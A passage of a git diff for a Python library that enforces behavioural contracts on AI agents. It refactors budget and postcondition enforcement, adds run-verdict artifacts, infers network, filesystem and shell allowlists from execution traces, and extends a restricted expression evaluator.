+ message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_cost(self, amount: float) -> None: - """Record cost and check against budget limit.""" try: self._budget_tracker.add_cost(amount) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_cost_usd", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_cost_usd", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e def add_tokens(self, count: int) -> None: - """Record token usage and check against budget limit.""" try: self._budget_tracker.add_tokens(count) - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_tokens", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_tokens", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - - # --- Output validation --- def validate_output(self, output_data: Any) -> List[str]: - """Validate output against the contract's output schema.""" if self._contract.output_schema is None: return [] validator = jsonschema.Draft202012Validator(self._contract.output_schema) errors = [e.message for e in validator.iter_errors(output_data)] if errors: - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="outputs.schema", + self._warnings.append(f"Output validation warnings: {errors}") + self._record_warn_event( + clause="outputs.schema", evidence={"errors": errors}, - severity="major", - enforcement="warned", ) return errors - # --- Postcondition evaluation --- - - def evaluate_postconditions(self, output: Any) -> List[PostconditionResult]: - """Evaluate all postconditions against the output.""" - - def on_warn(pc: Any, o: Any) -> None: - msg = f"Postcondition '{pc.name}' failed (sync_warn)" - self._warnings.append(msg) - self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause=f"contract.postconditions.{pc.name}", - evidence={"check": pc.check, "output_type": str(type(o).__name__)}, - severity=pc.severity, - enforcement="warned", + def evaluate_postconditions( + self, + output: Any, + *, + extra_context: Optional[Dict[str, Any]] = None, + ) -> List[PostconditionResult]: + self._last_output = output + self._last_extra_context = extra_context + merged_context: Dict[str, Any] = {"checks": self._check_context()} + if extra_context: + merged_context.update(extra_context) + + def on_warn(postcondition: Any, _: Any) -> None: + message = f"Postcondition '{postcondition.name}' failed (sync_warn)" + self._warnings.append(message) + self._record_warn_event( + clause=f"contract.postconditions.{postcondition.name}", + evidence={ + "check": postcondition.check, + "checks": self._check_context(), + }, + severity=postcondition.severity, ) - return evaluate_postconditions( - self._contract.postconditions, output, on_warn=on_warn - ) + results: List[PostconditionResult] + try: + results = evaluate_postconditions( + self._contract.postconditions, + output, + extra_context=merged_context, + on_warn=on_warn, + ) + except PostconditionError as exc: + self._postconditions_evaluated = True + self._postcondition_failure = exc + self._record_failed_event( + clause=f"contract.postconditions.{exc.postcondition.name}", + evidence={ + "check": exc.postcondition.check, + "checks": self._check_context(), + "output_type": type(output).__name__, + }, + severity=exc.postcondition.severity, + ) + raise + self._postconditions_evaluated = True + return results - # --- Duration check --- + def record_check( + self, + name: str, + status: CheckStatus, + *, + exit_code: Optional[int] = None, + detail: Optional[str] = None, + required: bool = True, + evidence: Optional[Dict[str, Any]] = None, + ) -> RunCheckResult: + allowed: List[str] = ["pass", "warn", "fail", "blocked", "skipped"] + if status not in allowed: + raise ValueError(f"Unsupported check status: {status}") + result = RunCheckResult( + name=name, + status=status, + required=required, + exit_code=exit_code, + detail=detail, + evidence=evidence or {}, + ) + self._checks[name] = result + if status == "warn": + self._warnings.append(f"Check '{name}' reported warning") + return result def check_duration(self) -> None: - """Check elapsed time against budget limit.""" try: self._budget_tracker.check_duration() - except BudgetExceededError as e: - event = self._emitter.create_event( - contract_id=self._contract.identity.name, - contract_version=self._contract.identity.version, - violated_clause="resources.budgets.max_duration_seconds", - evidence={"current": e.current, "limit": e.limit}, - severity="critical", - enforcement="blocked", + except BudgetExceededError as exc: + self._record_blocked_event( + clause="resources.budgets.max_duration_seconds", + evidence={"current": exc.current, "limit": exc.limit}, + message=str(exc), ) - raise ContractViolation(str(e), event=event) from e - # --- Context manager --- + def _default_artifact_path(self) -> str: + return ".agent-contracts/runs/{run_id}/verdict.json" + + def _resolved_artifact_path(self, artifact_path: Optional[Union[str, Path]]) -> Path: + raw = ( + str(artifact_path) + if artifact_path is not None + else ( + self._contract.observability.run_artifact_path + if self._contract.observability and self._contract.observability.run_artifact_path + else self._default_artifact_path() + ) + ) + formatted = raw.format(run_id=self._run_id) + path = Path(formatted) + if not path.is_absolute(): + path = self._repo_root / path + return path.resolve() + + def _snapshot_budgets(self) -> Dict[str, Any]: + snapshot: BudgetSnapshot = self._budget_tracker.snapshot() + return { + "cost_usd": snapshot.cost_usd, + "tokens": snapshot.tokens, + "tool_calls": snapshot.tool_calls, + "shell_commands": snapshot.shell_commands, + "duration_seconds": snapshot.elapsed_seconds, + } + + def finalize_run( + self, + *, + output: Any = None, + extra_context: Optional[Dict[str, Any]] = None, + artifact_path: Optional[Union[str, Path]] = None, + execution_error: Optional[BaseException] = None, + ) -> RunVerdict: + if self._finalized_verdict is not None and artifact_path is None: + return self._finalized_verdict + + if isinstance(execution_error, PostconditionError) and self._postcondition_failure is None: + self._postcondition_failure = execution_error + self._record_failed_event( + clause=f"contract.postconditions.{execution_error.postcondition.name}", + evidence={"check": execution_error.postcondition.check}, + severity=execution_error.postcondition.severity, + ) + if isinstance(execution_error, ContractViolation): + self._blocked = True + + candidate_output = self._last_output if output is None else output + if candidate_output is not None and not self._postconditions_evaluated: + try: + self.evaluate_postconditions(candidate_output, extra_context=extra_context) + except PostconditionError: + pass + + required_check_failure = any( + check.required and check.status in {"fail", "blocked"} + for check in self._checks.values() + ) + warning_present = any(check.status == "warn" for check in self._checks.values()) or bool( + self._warnings + ) + unexpected_error = ( + execution_error is not None + and not isinstance(execution_error, (ContractViolation, PostconditionError)) + ) + + if self._blocked: + outcome: Literal["pass", "warn", "blocked", "fail"] = "blocked" + final_gate: Literal["allowed", "blocked", "failed"] = "blocked" + elif self._postcondition_failure is not None or required_check_failure or unexpected_error: + outcome = "fail" + final_gate = "failed" + elif warning_present: + outcome = "warn" + final_gate = "allowed" + else: + outcome = "pass" + final_gate = "allowed" + + self._artifact_path = self._resolved_artifact_path(artifact_path) + timestamp = datetime.now(timezone.utc).isoformat() + contract_path = self._contract.source_path + artifacts: Dict[str, Any] = {"verdict_path": str(self._artifact_path)} + if contract_path is not None: + artifacts["contract_path"] = contract_path + + verdict = RunVerdict( + run_id=self._run_id, + contract={ + "name": self._contract.identity.name, + "version": self._contract.identity.version, + "spec_version": self._contract.spec_version, + }, + host={"name": self._host_name, "version": self._host_version}, + outcome=outcome, + final_gate=final_gate, + violations=[event.to_dict() for event in self.violations], + checks=self.checks, + budgets=self._snapshot_budgets(), + artifacts=artifacts, + timestamp=timestamp, + warnings=self.warnings, + ) + verdict.write_json(self._artifact_path) + self._finalized_verdict = verdict + return verdict def __enter__(self) -> "ContractEnforcer": return self def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None: - pass + if self._finalized_verdict is None: + self.finalize_run(execution_error=exc_val) def enforce_contract( @@ -265,14 +618,7 @@ def enforce_contract( violation_destination: str = "stdout", strict: bool = True, ) -> Callable[[F], F]: - """Decorator that wraps a function with contract enforcement. - - The decorated function receives a `_enforcer` keyword argument - providing the ContractEnforcer instance for tool call checks. - - Input validation runs before the function. - Output validation and postconditions run after. - """ + """Decorator that wraps a function with contract enforcement.""" contract = load_contract(source, strict=strict) def decorator(fn: F) -> F: @@ -281,37 +627,34 @@ def wrapper(*args: Any, **kwargs: Any) -> Any: enforcer = ContractEnforcer( contract, violation_destination=violation_destination ) - # Only inject _enforcer if the function accepts it sig = inspect.signature(fn) if "_enforcer" in sig.parameters or any( - p.kind == inspect.Parameter.VAR_KEYWORD for p in sig.parameters.values() + param.kind == inspect.Parameter.VAR_KEYWORD + for param in sig.parameters.values() ): kwargs["_enforcer"] = enforcer - # Pre: validate input if first positional arg is present - if args and contract.input_schema is not None: - errors = enforcer.validate_input(args[0]) - if errors: - raise ContractViolation( - f"Input validation failed: {errors}" - ) - - # Pre: evaluate preconditions - if args and contract.preconditions: - enforcer.check_preconditions(args[0]) + try: + if args and contract.input_schema is not None: + errors = enforcer.validate_input(args[0]) + if errors: + enforcer._blocked = True + raise ContractViolation(f"Input validation failed: {errors}") - result = fn(*args, **kwargs) + if args and contract.preconditions: + enforcer.check_preconditions(args[0]) - # Post: validate output - if contract.output_schema is not None: - errors = enforcer.validate_output(result) - if errors: - enforcer._warnings.append(f"Output validation warnings: {errors}") + result = fn(*args, **kwargs) - # Post: evaluate postconditions - enforcer.evaluate_postconditions(result) + if contract.output_schema is not None: + enforcer.validate_output(result) - return result + enforcer.evaluate_postconditions(result) + enforcer.finalize_run(output=result) + return result + except Exception as exc: + enforcer.finalize_run(execution_error=exc) + raise return wrapper # type: ignore[return-value] diff --git a/src/agent_contracts/init_from_trace.py b/src/agent_contracts/init_from_trace.py index 7d55da6..077f9fd 100644 --- a/src/agent_contracts/init_from_trace.py +++ b/src/agent_contracts/init_from_trace.py @@ -1,58 +1,168 @@ -"""Generate contract skeletons from execution traces. -Reads JSONL trace files and infers: -- Identity from agent metadata -- Tool allowlist from observed tool calls -- Budget estimates from observed resource usage -- Postcondition candidates from output patterns -""" +"""Generate coding-agent contract skeletons from execution traces.""" from __future__ import annotations import json -from pathlib import Path -from typing import Any, Dict, List, Optional, Set, Union +from pathlib import Path, PurePosixPath +from typing import Any, Dict, Iterable, List, Optional, Set, Tuple, Union, cast import yaml def _read_traces(source: Union[str, Path]) -> List[Dict[str, Any]]: - """Read JSONL trace file, returning list of trace entries.""" path = Path(source) traces: List[Dict[str, Any]] = [] - with open(path, encoding="utf-8") as f: - for _line_num, line in enumerate(f, 1): + with open(path, encoding="utf-8") as handle: + for line in handle: line = line.strip() if not line: continue try: - traces.append(json.loads(line)) + payload = json.loads(line) except json.JSONDecodeError: - pass # Skip malformed lines + continue + if isinstance(payload, dict): + traces.append(payload) return traces +def _iter_events(trace: Dict[str, Any]) -> Iterable[Dict[str, Any]]: + yield trace + events = trace.get("events", []) + if isinstance(events, list): + for event in events: + if isinstance(event, dict): + yield event + + def _extract_tools(traces: List[Dict[str, Any]]) -> List[str]: - """Extract unique tool names from traces.""" tools: Set[str] = set() for trace in traces: - # Support various trace formats - if "tool_calls" in trace: - for tc in trace["tool_calls"]: - name = tc.get("name") or tc.get("tool") or tc.get("function", {}).get("name") + for entry in _iter_events(trace): + tool_calls = entry.get("tool_calls", []) + if isinstance(tool_calls, list): + for tool_call in tool_calls: + if isinstance(tool_call, dict): + name = tool_call.get("name") or tool_call.get("tool") + if name: + tools.add(str(name)) + if entry.get("type") == "tool_call": + name = entry.get("name") or entry.get("tool_name") if name: - tools.add(name) - if "tool" in trace and "name" in trace: - tools.add(trace["name"]) - if "type" in trace and trace["type"] == "tool_call": - name = trace.get("name") or trace.get("tool_name") - if name: - tools.add(name) + tools.add(str(name)) return sorted(tools) -def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: - """Estimate budget limits from observed resource usage (with 20% headroom).""" +def _extract_network(traces: List[Dict[str, Any]]) -> List[str]: + urls: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + for key in ("url", "endpoint"): + value = entry.get(key) + if isinstance(value, str) and value.startswith(("http://", "https://")): + urls.add(value) + requests = entry.get("network_requests", []) + if isinstance(requests, list): + for request in requests: + if isinstance(request, dict): + url = request.get("url") + if isinstance(url, str): + urls.add(url) + return sorted(urls) + + +def _normalize_path(path: str) -> Optional[str]: + candidate = path.strip() + if not candidate: + return None + posix = PurePosixPath(candidate.lstrip("./")) + if str(posix) == ".": + return None + return posix.as_posix() + + +def _infer_globs(paths: Set[str]) -> List[str]: + patterns: Set[str] = set() + for path in paths: + normalized = _normalize_path(path) + if normalized is None: + continue + parts = PurePosixPath(normalized).parts + if len(parts) <= 1: + patterns.add(normalized) + else: + patterns.add(f"{parts[0]}/**") + return sorted(patterns) + + +def _extract_filesystem(traces: List[Dict[str, Any]]) -> Dict[str, List[str]]: + read_paths: Set[str] = set() + write_paths: Set[str] = set() + for trace in traces: + for entry in _iter_events(trace): + filesystem = entry.get("filesystem") + if isinstance(filesystem, dict): + for value in filesystem.get("read", []): + if isinstance(value, str): + read_paths.add(value) + for value in filesystem.get("write", []): + if isinstance(value, str): + write_paths.add(value) + for key in ("file_reads", "files_read", "read_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + read_paths.add(value) + for key in ("file_writes", "files_written", "write_paths"): + values = entry.get(key, []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + write_paths.add(value) + event_type = entry.get("type") + path_value = entry.get("path") + if isinstance(path_value, str): + if event_type in {"file_read", "filesystem.read"}: + read_paths.add(path_value) + if event_type in {"file_write", "filesystem.write"}: + write_paths.add(path_value) + result: Dict[str, List[str]] = {} + read_globs = _infer_globs(read_paths) + write_globs = _infer_globs(write_paths) + if read_globs: + result["read"] = read_globs + if write_globs: + result["write"] = write_globs + return result + + +def _extract_shell_commands(traces: List[Dict[str, Any]]) -> Tuple[List[str], int]: + commands: Set[str] = set() + max_count = 0 + for trace in traces: + count = 0 + for entry in _iter_events(trace): + values = entry.get("shell_commands", []) + if isinstance(values, list): + for value in values: + if isinstance(value, str): + commands.add(" ".join(value.strip().split())) + count += 1 + elif isinstance(value, dict) and isinstance(value.get("command"), str): + commands.add(" ".join(value["command"].strip().split())) + count += 1 + event_type = entry.get("type") + command = entry.get("command") + if event_type in {"shell", "shell_command", "command"} and isinstance(command, str): + commands.add(" ".join(command.strip().split())) + count += 1 + max_count = max(max_count, count) + return sorted(commands), max_count + + +def _extract_budgets(traces: List[Dict[str, Any]], max_shell_commands: int) -> Dict[str, Any]: max_cost = 0.0 max_tokens = 0 max_tool_calls = 0 @@ -64,11 +174,10 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: tokens = usage.get("total_tokens", 0) or trace.get("total_tokens", 0) tool_calls = len(trace.get("tool_calls", [])) duration = trace.get("duration_seconds", 0) or (trace.get("latency_ms") or 0) / 1000 - - max_cost = max(max_cost, cost) - max_tokens = max(max_tokens, tokens) - max_tool_calls = max(max_tool_calls, tool_calls) - max_duration = max(max_duration, duration) + max_cost = max(max_cost, float(cost or 0)) + max_tokens = max(max_tokens, int(tokens or 0)) + max_tool_calls = max(max_tool_calls, int(tool_calls)) + max_duration = max(max_duration, float(duration or 0)) budgets: Dict[str, Any] = {} if max_cost > 0: @@ -79,23 +188,22 @@ def _extract_budgets(traces: List[Dict[str, Any]]) -> Dict[str, Any]: budgets["max_tool_calls"] = int(max_tool_calls * 1.2) + 1 if max_duration > 0: budgets["max_duration_seconds"] = round(max_duration * 1.2, 1) - + if max_shell_commands > 0: + budgets["max_shell_commands"] = int(max_shell_commands * 1.2) + 1 return budgets def _extract_identity(traces: List[Dict[str, Any]]) -> Dict[str, str]: - """Extract agent identity from traces.""" for trace in traces: agent = trace.get("agent", {}) if isinstance(agent, dict): name = agent.get("name") version = agent.get("version") if name: - return {"name": name, "version": version or "0.1.0"} + return {"name": str(name), "version": str(version or "0.1.0")} agent_name = trace.get("agent_name") or trace.get("agent_id") if agent_name: - return {"name": agent_name, "version": "0.1.0"} - + return {"name": str(agent_name), "version": "0.1.0"} return {"name": "unnamed-agent", "version": "0.1.0"} @@ -105,12 +213,7 @@ def generate_contract_from_traces( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> Dict[str, Any]: - """Generate a contract skeleton from execution traces. - - Returns a dict ready to be serialized as YAML. - """ traces = _read_traces(source) - identity = _extract_identity(traces) if agent_name: identity["name"] = agent_name @@ -118,7 +221,10 @@ def generate_contract_from_traces( identity["version"] = agent_version tools = _extract_tools(traces) - budgets = _extract_budgets(traces) + network = _extract_network(traces) + filesystem = _extract_filesystem(traces) + shell_commands, max_shell_commands = _extract_shell_commands(traces) + budgets = _extract_budgets(traces, max_shell_commands) contract: Dict[str, Any] = { "agent_contract": "0.1.0", @@ -134,21 +240,23 @@ def generate_contract_from_traces( } ] }, + "observability": { + "run_artifact_path": ".agent-contracts/runs/{run_id}/verdict.json" + }, } - # Tier 1 fields (if we have data) - if tools: - contract["effects"] = { - "authorized": { - "tools": tools, - "network": [], - "state_writes": [], - } - } - + authorized: Dict[str, Any] = { + "tools": tools, + "network": network, + "state_writes": [], + } + if filesystem: + authorized["filesystem"] = filesystem + if shell_commands: + authorized["shell"] = {"commands": shell_commands} + contract["effects"] = {"authorized": authorized} if budgets: contract["resources"] = {"budgets": budgets} - return contract @@ -158,8 +266,7 @@ def generate_contract_yaml( agent_name: Optional[str] = None, agent_version: Optional[str] = None, ) -> str: - """Generate a contract YAML string from execution traces.""" data = generate_contract_from_traces( source, agent_name=agent_name, agent_version=agent_version ) - return yaml.dump(data, sort_keys=False, default_flow_style=False) + return cast(str, yaml.dump(data, sort_keys=False, default_flow_style=False)) diff --git a/src/agent_contracts/loader.py b/src/agent_contracts/loader.py index 834162e..73c0bc9 100644 --- a/src/agent_contracts/loader.py +++ b/src/agent_contracts/loader.py @@ -20,6 +20,7 @@ EffectsDeclared, ErrorDef, FailureModel, + FilesystemAuthorization, LatencySLO, MetricDef, ObservabilityConfig, @@ -27,6 +28,7 @@ PostconditionSLO, PreconditionDef, ResourceBudgets, + ShellAuthorization, SLOConfig, SubstitutionConfig, TracesConfig, @@ -81,10 +83,25 @@ def _build_postcondition(raw: Dict[str, Any]) -> PostconditionDef: def _build_effects_authorized(raw: Dict[str, Any]) -> EffectsAuthorized: + filesystem_raw = raw.get("filesystem") + filesystem = None + if isinstance(filesystem_raw, dict): + filesystem = FilesystemAuthorization( + read=filesystem_raw.get("read", []), + write=filesystem_raw.get("write", []), + ) + + shell_raw = raw.get("shell") + shell = None + if isinstance(shell_raw, dict): + shell = ShellAuthorization(commands=shell_raw.get("commands", [])) + return EffectsAuthorized( tools=raw.get("tools", []), network=raw.get("network", []), state_writes=raw.get("state_writes", []), + filesystem=filesystem, + shell=shell, ) @@ -103,6 +120,7 @@ def _build_budgets(raw: Dict[str, Any]) -> ResourceBudgets: max_tokens=budgets.get("max_tokens"), max_tool_calls=budgets.get("max_tool_calls"), max_duration_seconds=budgets.get("max_duration_seconds"), + max_shell_commands=budgets.get("max_shell_commands"), ) @@ -148,7 +166,12 @@ def _build_observability(raw: Dict[str, Any]) -> ObservabilityConfig: ] ve_raw = raw.get("violation_events") ve = ViolationEventsConfig(**ve_raw) if isinstance(ve_raw, dict) else None - return ObservabilityConfig(traces=traces, metrics=metrics, violation_events=ve) + return ObservabilityConfig( + traces=traces, + metrics=metrics, + violation_events=ve, + run_artifact_path=raw.get("run_artifact_path"), + ) def _build_versioning(raw: Dict[str, Any]) -> VersioningConfig: @@ -211,14 +234,15 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: contract_raw = data.get("contract", {}) postconditions = [_build_postcondition(p) for p in contract_raw.get("postconditions", [])] - # Tier 1 fields inputs_raw = data.get("inputs") input_schema = inputs_raw.get("schema") if isinstance(inputs_raw, dict) else None preconditions = None if isinstance(inputs_raw, dict) and "preconditions" in inputs_raw: preconditions = [ PreconditionDef( - name=p["name"], check=p["check"], description=p.get("description") + name=p["name"], + check=p["check"], + description=p.get("description"), ) for p in inputs_raw["preconditions"] ] @@ -238,7 +262,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: resources_raw = data.get("resources") budgets = _build_budgets(resources_raw) if isinstance(resources_raw, dict) else None - # Tier 2 fields fm_raw = data.get("failure_model") failure_model = _build_failure_model(fm_raw) if isinstance(fm_raw, dict) else None @@ -270,5 +293,6 @@ def load_contract(source: Union[str, Path], *, strict: bool = True) -> Contract: observability=observability, versioning=versioning, slo=slo, + source_path=str(Path(source).resolve()), raw=data, ) diff --git a/src/agent_contracts/postconditions.py b/src/agent_contracts/postconditions.py index 48d4a17..2e2ef97 100644 --- a/src/agent_contracts/postconditions.py +++ b/src/agent_contracts/postconditions.py @@ -6,7 +6,8 @@ - async_monitor: queues for asynchronous evaluation Expression evaluator uses a restricted subset — NO eval() or exec(). -Supports basic comparisons, membership tests, and type checks. +Supports basic comparisons, membership tests, length checks, and simple +boolean composition with `and` / `or`. """ from __future__ import annotations @@ -18,7 +19,6 @@ from agent_contracts.types import PostconditionDef, PreconditionDef -# Safe operators for expression evaluation _OPERATORS = { "==": operator.eq, "!=": operator.ne, @@ -42,11 +42,6 @@ def __init__(self, postcondition: PostconditionDef, output: Any) -> None: def _resolve_path(obj: Any, path: str) -> Any: - """Resolve a dotted path like 'output.status' against an object or dict. - - Only traverses dicts by key lookup. Does not use getattr to avoid - triggering properties or descriptors on untrusted objects. - """ parts = path.split(".") current = obj for part in parts: @@ -60,7 +55,6 @@ def _resolve_path(obj: Any, path: str) -> Any: def _parse_value(token: str) -> Any: - """Parse a literal value token (string, number, bool, None, list).""" token = token.strip() if token == "None" or token == "null": return None @@ -72,7 +66,6 @@ def _parse_value(token: str) -> Any: return token[1:-1] if token.startswith("'") and token.endswith("'"): return token[1:-1] - # Try list literal: ["a", "b"] if token.startswith("[") and token.endswith("]"): inner = token[1:-1].strip() if not inner: @@ -87,11 +80,10 @@ def _parse_value(token: str) -> Any: return float(token) except ValueError: pass - return token # Treat as identifier path + return token def _split_list_items(s: str) -> List[str]: - """Split comma-separated items, respecting quoted strings.""" items: List[str] = [] current: List[str] = [] in_quote: Optional[str] = None @@ -113,65 +105,94 @@ def _split_list_items(s: str) -> List[str]: return items +def _split_logical(expr: str, operator_token: str) -> List[str]: + parts: List[str] = [] + current: List[str] = [] + depth = 0 + in_quote: Optional[str] = None + i = 0 + while i < len(expr): + ch = expr[i] + if in_quote: + current.append(ch) + if ch == in_quote: + in_quote = None + i += 1 + continue + if ch in ('"', "'"): + in_quote = ch + current.append(ch) + i += 1 + continue + if ch in "([": + depth += 1 + current.append(ch) + i += 1 + continue + if ch in ")]": + depth = max(0, depth - 1) + current.append(ch) + i += 1 + continue + if depth == 0 and expr.startswith(operator_token, i): + parts.append("".join(current).strip()) + current = [] + i += len(operator_token) + continue + current.append(ch) + i += 1 + if current: + parts.append("".join(current).strip()) + return parts + + def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: - """Evaluate a CEL-like expression safely against a context dict. - - Supported forms: - - "output is not None" - - "output is None" - - "output.status == \"resolved\"" - - "output.status in [\"resolved\", \"escalated\"]" - - "output.status not in [\"failed\"]" - - "len(output.items) > 0" - - "output.score >= 0.8" - - "true" / "false" - - Returns True if the check passes, False otherwise. - """ check = check.strip() + or_parts = _split_logical(check, " or ") + if len(or_parts) > 1: + return any(evaluate_expression(part, context) for part in or_parts) + + and_parts = _split_logical(check, " and ") + if len(and_parts) > 1: + return all(evaluate_expression(part, context) for part in and_parts) + if check in ("true", "True"): return True if check in ("false", "False"): return False - # "X is not None" - m = re.match(r"^(\S+)\s+is\s+not\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+not\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is not None - # "X is None" - m = re.match(r"^(\S+)\s+is\s+None$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^(\S+)\s+is\s+None$", check) + if match: + val = _resolve_path(context, match.group(1)) return val is None - # "X not in [...]" - m = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+not\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val not in allowed - # "X in [...]" - m = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) - if m: - val = _resolve_path(context, m.group(1)) - allowed = _parse_value(m.group(2)) + match = re.match(r"^(\S+)\s+in\s+(\[.+\])$", check) + if match: + val = _resolve_path(context, match.group(1)) + allowed = _parse_value(match.group(2)) return val in allowed - # "len(X) op Y" - m = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) - if m: - val = _resolve_path(context, m.group(1)) + match = re.match(r"^len\((\S+)\)\s*(==|!=|>=?|<=?)\s*(.+)$", check) + if match: + val = _resolve_path(context, match.group(1)) if val is None: return False - op_fn = _OPERATORS[m.group(2)] - rhs = _parse_value(m.group(3)) + op_fn = _OPERATORS[match.group(2)] + rhs = _parse_value(match.group(3)) return bool(op_fn(len(val), rhs)) - # "X op Y" (comparison) for op_str in (">=", "<=", "!=", "==", ">", "<"): parts = check.split(op_str, 1) if len(parts) == 2: @@ -189,7 +210,6 @@ def evaluate_expression(check: str, context: Dict[str, Any]) -> bool: except TypeError: return False - # Fallback: treat as a path and check truthiness val = _resolve_path(context, check) return bool(val) @@ -219,13 +239,6 @@ def evaluate_preconditions( *, raise_on_failure: bool = True, ) -> List[PreconditionResult]: - """Evaluate all preconditions against input data. - - Preconditions use the same expression evaluator as postconditions. - Context key is 'input' instead of 'output'. - - If raise_on_failure is True, raises PreconditionError on first failure. - """ context: Dict[str, Any] = {"input": input_data} results: List[PreconditionResult] = [] @@ -255,14 +268,6 @@ def evaluate_postconditions( on_warn: Optional[Callable[[PostconditionDef, Any], None]] = None, on_async: Optional[Callable[[PostconditionDef, Any], None]] = None, ) -> List[PostconditionResult]: - """Evaluate all postconditions against an output. - - - sync_block: raises PostconditionError on failure - - sync_warn: calls on_warn callback on failure - - async_monitor: calls on_async callback (deferred evaluation) - - Returns list of results for all evaluated postconditions. - """ context: Dict[str, Any] = {"output": output} if extra_context: context.update(extra_context) @@ -273,21 +278,26 @@ def evaluate_postconditions( if pc.enforcement == "async_monitor": if on_async: on_async(pc, output) - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor")) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement="async_monitor") + ) continue - # Skip eval:judge checks — they require external LLM call if pc.check.startswith("eval:"): - results.append(PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=True, enforcement=pc.enforcement) + ) continue passed = evaluate_expression(pc.check, context) - results.append(PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement)) + results.append( + PostconditionResult(postcondition=pc, passed=passed, enforcement=pc.enforcement) + ) if not passed: if pc.enforcement == "sync_block": raise PostconditionError(pc, output) - elif pc.enforcement == "sync_warn" and on_warn: + if pc.enforcement == "sync_warn" and on_warn: on_warn(pc, output) return results diff --git a/src/agent_contracts/schemas/agent-contract.schema.json b/src/agent_contracts/schemas/agent-contract.schema.json index ef8667e..6ee5748 100644 --- a/src/agent_contracts/schemas/agent-contract.schema.json +++ b/src/agent_contracts/schemas/agent-contract.schema.json @@ -4,7 +4,11 @@ "title": "Agent Contract", "description": "YAML specification for enforceable agent behavioral contracts. Supports three graduated tiers: Standalone (Tier 0), Enforceable (Tier 1), and Composable (Tier 2).", "type": "object", - "required": ["agent_contract", "identity", "contract"], + "required": [ + "agent_contract", + "identity", + "contract" + ], "additionalProperties": true, "patternProperties": { "^x-": { @@ -54,7 +58,10 @@ "$defs": { "Identity": { "type": "object", - "required": ["name", "version"], + "required": [ + "name", + "version" + ], "additionalProperties": true, "properties": { "name": { @@ -73,27 +80,36 @@ }, "authors": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "List of agent authors or maintainers." } } }, "Contract": { "type": "object", - "required": ["postconditions"], + "required": [ + "postconditions" + ], "additionalProperties": true, "properties": { "postconditions": { "type": "array", "minItems": 1, - "items": { "$ref": "#/$defs/Postcondition" }, + "items": { + "$ref": "#/$defs/Postcondition" + }, "description": "At least one machine-checkable output guarantee. This is what makes it a contract, not a README." } } }, "Postcondition": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "additionalProperties": true, "properties": { "name": { @@ -108,13 +124,21 @@ }, "enforcement": { "type": "string", - "enum": ["sync_block", "sync_warn", "async_monitor"], + "enum": [ + "sync_block", + "sync_warn", + "async_monitor" + ], "default": "sync_warn", "description": "When and how this check runs. sync_block: fails the invocation. sync_warn: logs warning. async_monitor: evaluates asynchronously." }, "severity": { "type": "string", - "enum": ["critical", "major", "minor"], + "enum": [ + "critical", + "major", + "minor" + ], "default": "major", "description": "Impact level when this postcondition fails." }, @@ -155,11 +179,20 @@ "type": "array", "items": { "type": "object", - "required": ["name", "check"], + "required": [ + "name", + "check" + ], "properties": { - "name": { "type": "string" }, - "check": { "type": "string" }, - "description": { "type": "string" } + "name": { + "type": "string" + }, + "check": { + "type": "string" + }, + "description": { + "type": "string" + } } }, "description": "Preconditions that must hold before the agent runs." @@ -190,44 +223,62 @@ }, "EffectsAuthorized": { "type": "object", - "description": "Capability scope — what the agent MAY do. Default: deny all. Composes via intersection during delegation.", + "description": "Capability scope \u2014 what the agent MAY do. Default: deny all. Composes via intersection during delegation.", "additionalProperties": true, "properties": { "tools": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowlist of tool names or glob patterns (e.g., 'database.*'). Tools not listed are BLOCKED." }, "network": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed network egress URL patterns (e.g., 'https://api.example.com/*')." }, "state_writes": { "type": "array", - "items": { "type": "string" }, + "items": { + "type": "string" + }, "description": "Allowed state write scope patterns (e.g., 'tickets.*', 'user.preferences')." + }, + "filesystem": { + "$ref": 